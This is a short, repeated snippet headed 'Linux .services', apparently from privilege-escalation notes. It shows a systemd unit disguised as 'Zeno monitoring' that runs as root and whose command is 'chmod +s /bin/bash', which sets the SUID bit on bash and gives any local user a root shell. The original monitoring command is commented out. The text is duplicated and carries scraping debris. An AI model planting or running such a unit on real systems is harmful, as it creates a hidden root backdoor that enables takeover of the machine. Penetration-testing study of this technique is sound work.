Linux `.services` ๐
[Unit]
Description=Zeno monitoring
[Service]
Type=simple
User=root
#ExecStart=/root/zeno-monitoring.py
ExecStart=/usr/bin/chmod +s /bin/bash
[Install]
WantedBy=multi-user.targetLast updated
[Unit]
Description=Zeno monitoring
[Service]
Type=simple
User=root
#ExecStart=/root/zeno-monitoring.py
ExecStart=/usr/bin/chmod +s /bin/bash
[Install]
WantedBy=multi-user.targetLast updated